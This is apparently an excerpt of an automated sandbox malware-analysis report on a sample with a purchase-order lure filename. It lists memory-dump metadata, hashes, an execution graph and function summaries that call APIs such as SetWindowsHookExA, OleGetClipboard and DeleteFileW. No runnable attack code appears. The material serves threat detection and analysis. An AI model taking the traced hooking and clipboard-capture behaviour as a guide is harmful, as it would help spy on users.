                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,Sgl$,Sgl$d5Wk$Rgl$]l$]l
                                        • API String ID: 0-1364360042
                                        • Opcode ID: 0ce919836b4a102a1cfe7b92ab063a62e3a8fcf2c8e88808922c78069b5c393e
                                        • Instruction ID: 5eb3958533ce36c410b0d0e964dbe7ca1f86e0f48e0c5f83c3adea61d6dc24d8
                                        • Opcode Fuzzy Hash: 0ce919836b4a102a1cfe7b92ab063a62e3a8fcf2c8e88808922c78069b5c393e
                                        • Instruction Fuzzy Hash: 1DF108F17043468FEB299A6888117E6BBB2FFC6610F1480EBD565CF251DA31CC45CBA2
                                        Function 04CF4D62 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ?n^$?n^$?n^$?n^
                                        • API String ID: 0-3486349104
                                        • Opcode ID: 787bb595cacefee980b86c091fb162e07d7e388601807fad05ae02ad58f56385
                                        • Instruction ID: c10e34e89c0d079034571da799faed37e958f7053c8ae3655adf45c9556116f4
                                        • Opcode Fuzzy Hash: 787bb595cacefee980b86c091fb162e07d7e388601807fad05ae02ad58f56385
                                        • Instruction Fuzzy Hash: CF31852160D3C08FD307EB2CD8B46957FE5AF97294B1A40DBD0C8CF2A3DA249849C756

                                        Execution Graph

                                        Execution Coverage:9%
                                        Dynamic/Decrypted Code Coverage:99.5%
                                        Signature Coverage:0%
                                        Total number of Nodes:188
                                        Total number of Limit Nodes:22
                                        execution_graph 24955 56860a8 24956 56860b5 24955->24956 24960 5687020 24956->24960 24971 5687011 24956->24971 24961 568704b 24960->24961 24982 5685e40 24961->24982 24964 56870ce 24965 56870fa 24964->24965 24993 5686cbc 24964->24993 24965->24965 24968 5685e40 GetModuleHandleW 24968->24964 24972 568704b 24971->24972 24973 5685e40 GetModuleHandleW 24972->24973 24974 56870b2 24973->24974 24980 5685e40 GetModuleHandleW 24974->24980 24981 56874f1 GetModuleHandleW 24974->24981 24975 56870ce 24976 5686cbc GetModuleHandleW 24975->24976 24978 56870fa 24975->24978 24977 568713e 24976->24977 24979 5688aad CreateWindowExW 24977->24979 24979->24978 24980->24975 24981->24975 24983 5685e4b 24982->24983 24984 56870b2 24983->24984 25002 56877fe 24983->25002 25010 568776f 24983->25010 24984->24968 24987 56874f1 24984->24987 24988 568750b 24987->24988 24989 568750f 24987->24989 24988->24964 24990 568764e 24989->24990 24991 56877fe GetModuleHandleW 24989->24991 24992 568776f GetModuleHandleW 24989->24992 24991->24990 24992->24990 24995 5687a50 GetModuleHandleW 24993->24995 24996 568713e 24995->24996 24997 5688aad 24996->24997 24998 5688ab1 24997->24998 24999 5688ae5 CreateWindowExW 24997->24999 24998->24965 25001 5688c1c 24999->25001 25001->25001 25003 5687837 25002->25003 25004 5686cbc GetModuleHandleW 25003->25004 25005 568789a 25004->25005 25006 5686cbc GetModuleHandleW 25005->25006 25007 5687914 25005->25007 25008 56878e8 25006->25008 25007->24984 25008->25007 25009 5686cbc GetModuleHandleW 25008->25009 25009->25007 25011 568777a 25010->25011 25012 5686cbc GetModuleHandleW 25011->25012 25013 568789a 25012->25013 25014 5686cbc GetModuleHandleW 25013->25014 25017 5687914 25013->25017 25015 56878e8 25014->25015 25016 5686cbc GetModuleHandleW 25015->25016 25015->25017 25016->25017 25017->24984 25018 5687a4a 25019 5687a98 GetModuleHandleW 25018->25019 25020 5687a92 25018->25020 25021 5687ac5 25019->25021 25020->25019 25041 ecfd78 25043 ecfdbc SetWindowsHookExA 25041->25043 25044 ecfe02 25043->25044 25022 568d9e0 25023 568d9e8 25022->25023 25025 568da0b 25023->25025 25026 568c4a4 25023->25026 25027 568da20 KiUserCallbackDispatcher 25026->25027 25029 568da8e 25027->25029 25029->25023 25030 568e2a0 25031 568e2ab 25030->25031 25032 568e2bb 25031->25032 25034 568c5ec 25031->25034 25035 568e2f0 OleInitialize 25034->25035 25036 568e354 25035->25036 25036->25032 25045 568c850 DuplicateHandle 25046 568c8e6 25045->25046 25037 ec7260 25038 ec72a6 DeleteFileW 25037->25038 25040 ec72df 25038->25040 25047 e1d01c 25048 e1d034 25047->25048 25049 e1d08e 25048->25049 25056 5688dd0 25048->25056 25068 5686e05 25048->25068 25080 5686df4 25048->25080 25088 5688ca2 25048->25088 25092 568d432 25048->25092 25101 5688cb0 25048->25101 25057 5688e2b 25056->25057 25058 5685e40 GetModuleHandleW 25057->25058 25059 5688e49 25058->25059 25060 5686cbc GetModuleHandleW 25059->25060 25061 5688eb7 25059->25061 25060->25061 25062 568d4c1 25061->25062 25064 568d4b1 25061->25064 25117 568c44c 25062->25117 25105 568d5d8 25064->25105 25111 568d5e8 25064->25111 25065 568d4bf 25069 5686e08 25068->25069 25077 5686dfc 25068->25077 25072 5685e40 GetModuleHandleW 25069->25072 25070 568d4c1 25071 568c44c 2 API calls 25070->25071 25074 568d4bf 25071->25074 25075 5688e49 25072->25075 25073 568d4b1 25078 568d5e8 2 API calls 25073->25078 25079 568d5d8 2 API calls 25073->25079 25076 5686cbc GetModuleHandleW 25075->25076 25075->25077 25076->25077 25077->25070 25077->25073 25078->25074 25079->25074 25081 5686dff 25080->25081 25082 568d4c1 25081->25082 25084 568d4b1 25081->25084 25083 568c44c 2 API calls 25082->25083 25085 568d4bf 25083->25085 25086 568d5e8 2 API calls 25084->25086 25087 568d5d8 2 API calls 25084->25087 25086->25085 25087->25085 25089 5688cd6 25088->25089 25090 5686df4 2 API calls 25089->25090 25091 5688cf7 25090->25091 25091->25049 25093 568d43a 25092->25093 25094 568d44a 25092->25094 25093->25049 25095 568d4c1 25094->25095 25097 568d4b1 25094->25097 25096 568c44c 2 API calls 25095->25096 25098 568d4bf 25096->25098 25099 568d5e8 2 API calls 25097->25099 25100 568d5d8 2 API calls 25097->25100 25099->25098 25100->25098 25102 5688cd6 25101->25102 25103 5686df4 2 API calls 25102->25103 25104 5688cf7 25103->25104 25104->25049 25107 568d5f6 25105->25107 25106 568c44c 2 API calls 25106->25107 25107->25106 25108 568d6d2 25107->25108 25124 568dab0 25107->25124 25129 568dac0 25107->25129 25108->25065 25113 568d5f6 25111->25113 25112 568c44c 2 API calls 25112->25113 25113->25112 25114 568d6d2 25113->25114 25115 568dac0 OleGetClipboard 25113->25115 25116 568dab0 OleGetClipboard 25113->25116 25114->25065 25115->25113 25116->25113 25118 568c457 25117->25118 25119 568d72a 25118->25119 25120 568d7d4 25118->25120 25122 568d782 CallWindowProcW 25119->25122 25123 568d731 25119->25123 25121 5686df4 OleGetClipboard 25120->25121 25121->25123 25122->25123 25123->25065 25125 568dac0 25124->25125 25126 568db66 25125->25126 25134 568e058 25125->25134 25140 568e080 25125->25140 25126->25107 25130 568dadf 25129->25130 25131 568db66 25130->25131 25132 568e058 OleGetClipboard 25130->25132 25133 568e080 OleGetClipboard 25130->25133 25131->25107 25132->25130 25133->25130 25135 568e05d 25134->25135 25136 568e09c 25135->25136 25146 568e0c8 25135->25146 25157 568e0b8 25135->25157 25136->25125 25137 568e0b1 25137->25125 25142 568e088 25140->25142 25141 568e09c 25141->25125 25142->25141 25144 568e0c8 OleGetClipboard 25142->25144 25145 568e0b8 OleGetClipboard 25142->25145 25143 568e0b1 25143->25125 25144->25143 25145->25143 25147 568e0da 25146->25147 25148 568e139 25147->25148 25149 568e0f5 25147->25149 25152 568e1b9 25148->25152 25168 568e380 25148->25168 25172 568e390 25148->25172 25155 568e0c8 OleGetClipboard 25149->25155 25156 568e0b8 OleGetClipboard 25149->25156 25150 568e0fb 25150->25137 25151 568e1d7 25151->25137 25152->25137 25155->25150 25156->25150 25158 568e0c8 25157->25158 25159 568e0f5 25158->25159 25161 568e139 25158->25161 25166 568e0c8 OleGetClipboard 25159->25166 25167 568e0b8 OleGetClipboard 25159->25167 25160 568e0fb 25160->25137 25163 568e1b9 25161->25163 25164 568e380 OleGetClipboard 25161->25164 25165 568e390 OleGetClipboard 25161->25165 25162 568e1d7 25162->25137 25163->25137 25164->25162 25165->25162 25166->25160 25167->25160 25169 568e390 25168->25169 25171 568e3cb 25169->25171 25176 568de68 25169->25176 25171->25151 25174 568e3a5 25172->25174 25173 568de68 OleGetClipboard 25173->25174 25174->25173 25175 568e3cb 25174->25175 25175->25151 25177 568e438 OleGetClipboard 25176->25177 25179 568e4d2 25177->25179

                                        Executed Functions

                                        Function 05688AAD Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 958 5688aad-5688aaf 959 5688ab1-5688ad8 call 5686dcc 958->959 960 5688ae5-5688b5e 958->960 964 5688add-5688ade 959->964 962 5688b69-5688b70 960->962 963 5688b60-5688b66 960->963 965 5688b7b-5688c1a CreateWindowExW 962->965 966 5688b72-5688b78 962->966 963->962 968 5688c1c-5688c22 965->968 969 5688c23-5688c5b 965->969 966->965 968->969 973 5688c68 969->973 974 5688c5d-5688c60 969->974 975 5688c69 973->975 974->973 975->975
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: bbf46cf13f61dbf9bf70cec7cba579ae330911c136ffe383da3d1c375b72befd
                                        • Instruction ID: 706b804c482c478b2fafcad761cc006795205b267d0d61ec46e68fb456c320df
                                        • Opcode Fuzzy Hash: bbf46cf13f61dbf9bf70cec7cba579ae330911c136ffe383da3d1c375b72befd
                                        • Instruction Fuzzy Hash: 3051FFB1D00249EFDF15CFA9C884ADEBBB2BF48310F65866AE409AB220D7719845CF50
                                        Function 05688AEE Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 976 5688aee-5688b5e 977 5688b69-5688b70 976->977 978 5688b60-5688b66 976->978 979 5688b7b-5688bb3 977->979 980 5688b72-5688b78 977->980 978->977 981 5688bbb-5688c1a CreateWindowExW 979->981 980->979 982 5688c1c-5688c22 981->982 983 5688c23-5688c5b 981->983 982->983 987 5688c68 983->987 988 5688c5d-5688c60 983->988 989 5688c69 987->989 988->987 989->989
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 7cab9b01f98f04ccf9a67a7aa35011db9c9925157d395703840ad58dbdbfc23f
                                        • Instruction ID: cb24e5f60d31c1ec372395515ab1645b5271316ee26967bfef2d8cb5c882bae2
                                        • Opcode Fuzzy Hash: 7cab9b01f98f04ccf9a67a7aa35011db9c9925157d395703840ad58dbdbfc23f
                                        • Instruction Fuzzy Hash: B051C1B1D00309DFDB14DFAAC884ADEBBB5FF88310F64862AE419AB250D7759945CF90
                                        Function 05688AF8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 990 5688af8-5688b5e 991 5688b69-5688b70 990->991 992 5688b60-5688b66 990->992 993 5688b7b-5688bb3 991->993 994 5688b72-5688b78 991->994 992->991 995 5688bbb-5688c1a CreateWindowExW 993->995 994->993 996 5688c1c-5688c22 995->996 997 5688c23-5688c5b 995->997 996->997 1001 5688c68 997->1001 1002 5688c5d-5688c60 997->1002 1003 5688c69 1001->1003 1002->1001 1003->1003
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 72f5725dcf7b9d03a61f6d8c72215a75c027e98896eb76abbae0750d5b7567dd
                                        • Instruction ID: 0ad07146678a899aeb642458da1c582059abf9b6435acb68bba5c50dc369401b
                                        • Opcode Fuzzy Hash: 72f5725dcf7b9d03a61f6d8c72215a75c027e98896eb76abbae0750d5b7567dd
                                        • Instruction Fuzzy Hash: 0541B1B1D00309DFDB14DFAAC884ADEBBB5FF88310F64862AE419AB250D7759945CF90
                                        Function 0568C44C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1004 568c44c-568d724 1007 568d72a-568d72f 1004->1007 1008 568d7d4-568d7f4 call 5686df4 1004->1008 1010 568d731-568d768 1007->1010 1011 568d782-568d7ba CallWindowProcW 1007->1011 1015 568d7f7-568d804 1008->1015 1018 568d76a-568d770 1010->1018 1019 568d771-568d780 1010->1019 1012 568d7bc-568d7c2 1011->1012 1013 568d7c3-568d7d2 1011->1013 1012->1013 1013->1015 1018->1019 1019->1015
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0568D7A9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 743d5f9d73176db8bd0bf0092b6808c8ffd84ccf1fb26b16513d4ae84b15a46c
                                        • Instruction ID: da3ed557d14ea47dd22b029fa9c1ac8135f930dff7d0eb0c9571f7291be21fea
                                        • Opcode Fuzzy Hash: 743d5f9d73176db8bd0bf0092b6808c8ffd84ccf1fb26b16513d4ae84b15a46c
                                        • Instruction Fuzzy Hash: 194149B8900749CFDB14DF99C888AAABBF5FF88314F24C559D419AB361D374A841CFA0
                                        Function 0568E42C Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1021 568e42c-568e488 1023 568e492-568e4d0 OleGetClipboard 1021->1023 1024 568e4d9-568e527 1023->1024 1025 568e4d2-568e4d8 1023->1025 1030 568e529-568e52d 1024->1030 1031 568e537 1024->1031 1025->1024 1030->1031 1032 568e52f 1030->1032 1033 568e538 1031->1033 1032->1031 1033->1033
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: aeb6e442f6f2f6e5bae991c1842e5bdd8cc1e8cff72ce1e7e129b588c8b367b0
                                        • Instruction ID: d8739451ad6a88d322f47aec57469c5eb4c348b65d469af623589182d8bd7fb8
                                        • Opcode Fuzzy Hash: aeb6e442f6f2f6e5bae991c1842e5bdd8cc1e8cff72ce1e7e129b588c8b367b0
                                        • Instruction Fuzzy Hash: 813112B0D01248DFEB14DF99C484B9EBBF5AB48304F208119E404BB390DBB6A949CB65
                                        Function 0568DE68 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1034 568de68-568e4d0 OleGetClipboard 1037 568e4d9-568e527 1034->1037 1038 568e4d2-568e4d8 1034->1038 1043 568e529-568e52d 1037->1043 1044 568e537 1037->1044 1038->1037 1043->1044 1045 568e52f 1043->1045 1046 568e538 1044->1046 1045->1044 1046->1046
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: dce5a3ab1e49bf87fda8b04d28928a1cf30fc4c62920cf05c05f481d0b69dfea
                                        • Instruction ID: 7a13ccf4bc4f77f8416d27ec5e0c8d2fced080f59eb9ed74e7b5b2fc6c7a9afd
                                        • Opcode Fuzzy Hash: dce5a3ab1e49bf87fda8b04d28928a1cf30fc4c62920cf05c05f481d0b69dfea
                                        • Instruction Fuzzy Hash: 533102B0E01249DFEB14DF99C984B9EBBF5BF48304F208119E408BB390D7B6A945CB65
                                        Function 0568C848 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1047 568c848-568c84d 1048 568c850-568c8e4 DuplicateHandle 1047->1048 1049 568c8ed-568c90a 1048->1049 1050 568c8e6-568c8ec 1048->1050 1050->1049
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0568C8D7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d4d0197b034926aba190baca1a2cad4826df3784f6b05a823092b899820d5945
                                        • Instruction ID: 7ff709e67f8aa2442c3fcd43a45807855757b1b8c6e6ea4cfb9a8ba46dec38e4
                                        • Opcode Fuzzy Hash: d4d0197b034926aba190baca1a2cad4826df3784f6b05a823092b899820d5945
                                        • Instruction Fuzzy Hash: 5D21E4B5D00249AFDB10CFAAD484AEEBFF8FB48310F14841AE959A7310D374A945CF64
                                        Function 0568C850 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1053 568c850-568c8e4 DuplicateHandle 1054 568c8ed-568c90a 1053->1054 1055 568c8e6-568c8ec 1053->1055 1055->1054
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0568C8D7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d3a069b790d26ec87aec99d568555531a098eff7472dd2a3b1550d5684231df0
                                        • Instruction ID: 9ebce4178a70bca25b136f11008ad4681cbf390120e6976093618cf6965f7d98
                                        • Opcode Fuzzy Hash: d3a069b790d26ec87aec99d568555531a098eff7472dd2a3b1550d5684231df0
                                        • Instruction Fuzzy Hash: 7421C4B5900249AFDB10CFAAD484AEEBBF8FB48310F14841AE915A7350D375A944CF65
                                        Function 00EC7258 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1058 ec7258-ec72aa 1060 ec72ac-ec72af 1058->1060 1061 ec72b2-ec72dd DeleteFileW 1058->1061 1060->1061 1062 ec72df-ec72e5 1061->1062 1063 ec72e6-ec730e 1061->1063 1062->1063
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00EC72D0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: fc68c4cf7506de17df83db4c9a95fc6947329aa025d15e0d55894800fec42468
                                        • Instruction ID: 13fb9b3a05ffafaec8bba0654b5cb2b394b0625ee506ed2c897e1aaa61edd2f6
                                        • Opcode Fuzzy Hash: fc68c4cf7506de17df83db4c9a95fc6947329aa025d15e0d55894800fec42468
                                        • Instruction Fuzzy Hash: B62133B1C0465A9FDB14CF9AC440BDEFBF4FB48320F10816AE818A7250D378AA45CFA0
                                        Function 00ECFD71 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1066 ecfd71-ecfdc2 1069 ecfdce-ecfe00 SetWindowsHookExA 1066->1069 1070 ecfdc4-ecfdcc 1066->1070 1071 ecfe09-ecfe29 1069->1071 1072 ecfe02-ecfe08 1069->1072 1070->1069 1072->1071
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00ECFDF3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 9416427abaad84090e44e75171940d185973cd038a8ff4c4baf547a7d9310486
                                        • Instruction ID: c11b3480e02451f052c91b62cfd96bbb7479204801367423eb604b56e1348ca3
                                        • Opcode Fuzzy Hash: 9416427abaad84090e44e75171940d185973cd038a8ff4c4baf547a7d9310486
                                        • Instruction Fuzzy Hash: C62124B59002499FDB14CFAAC944BEEFBF5FB88320F14842AE419A7250C775A941CFA0
                                        Function 00ECFD78 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1076 ecfd78-ecfdc2 1078 ecfdce-ecfe00 SetWindowsHookExA 1076->1078 1079 ecfdc4-ecfdcc 1076->1079 1080 ecfe09-ecfe29 1078->1080 1081 ecfe02-ecfe08 1078->1081 1079->1078 1081->1080
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00ECFDF3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: d00bad2ebacfe02ce36a48e4650a46177b579b9e75e97d671b27bc8a24d1af5c
                                        • Instruction ID: 4cda2fd3e3e66a5ca0ddef87a83a3d8c31b11553347a335527a04c1335a06b35
                                        • Opcode Fuzzy Hash: d00bad2ebacfe02ce36a48e4650a46177b579b9e75e97d671b27bc8a24d1af5c
                                        • Instruction Fuzzy Hash: BD2124B59002499FDB14CFAAC844BEEFBF5FB88310F10842AE419A7250C775A941CFA0
                                        Function 00EC7260 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1085 ec7260-ec72aa 1087 ec72ac-ec72af 1085->1087 1088 ec72b2-ec72dd DeleteFileW 1085->1088 1087->1088 1089 ec72df-ec72e5 1088->1089 1090 ec72e6-ec730e 1088->1090 1089->1090
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00EC72D0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 2bb1c999eac743a79a8eb2cbfef8fd451242aca6f27677cce67ff519d9261b8d
                                        • Instruction ID: 9c2874902ff698fd8c501a1287b54695343e40c6f61304e500b3231efe5ace81
                                        • Opcode Fuzzy Hash: 2bb1c999eac743a79a8eb2cbfef8fd451242aca6f27677cce67ff519d9261b8d
                                        • Instruction Fuzzy Hash: 9A1133B1C0465A9BDB14CF9AC544BEEFBF4FB48320F10812AE858B7240D778A941CFA5
                                        Function 05686CBC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1093 5686cbc-5687a90 1095 5687a98-5687ac3 GetModuleHandleW 1093->1095 1096 5687a92-5687a95 1093->1096 1097 5687acc-5687ae0 1095->1097 1098 5687ac5-5687acb 1095->1098 1096->1095 1098->1097
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05687AB6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 30d6d3280b614d8cc26c14dc43e82d29356356b272d831f7452f4f98c86d234c
                                        • Instruction ID: 122f6e02f0a1a3949564919803a8b281c0f879aa65fea7a1e279258b0ea0739f
                                        • Opcode Fuzzy Hash: 30d6d3280b614d8cc26c14dc43e82d29356356b272d831f7452f4f98c86d234c
                                        • Instruction Fuzzy Hash: 741132B1C006498FDB10DF9AC444BAEFBF4EB88214F20856AD829B7300C776A605CFA0
                                        Function 05687A4A Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1100 5687a4a-5687a90 1101 5687a98-5687ac3 GetModuleHandleW 1100->1101 1102 5687a92-5687a95 1100->1102 1103 5687acc-5687ae0 1101->1103 1104 5687ac5-5687acb 1101->1104 1102->1101 1104->1103
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05687AB6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 2e862a1e6a3494f8da099ca5be96c1bc505c6f0e1ec93b47b979ac6c9b250c35
                                        • Instruction ID: dd0c68263d4230af9b63597aa8692796f51aa2762ae9f3b21b447a5c8efbf95a
                                        • Opcode Fuzzy Hash: 2e862a1e6a3494f8da099ca5be96c1bc505c6f0e1ec93b47b979ac6c9b250c35
                                        • Instruction Fuzzy Hash: C81102B5C0064A8FDB10DF9AD444BDEFBF4EB88210F14856AD469A7600C775A646CFA1
                                        Function 0568C5EC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
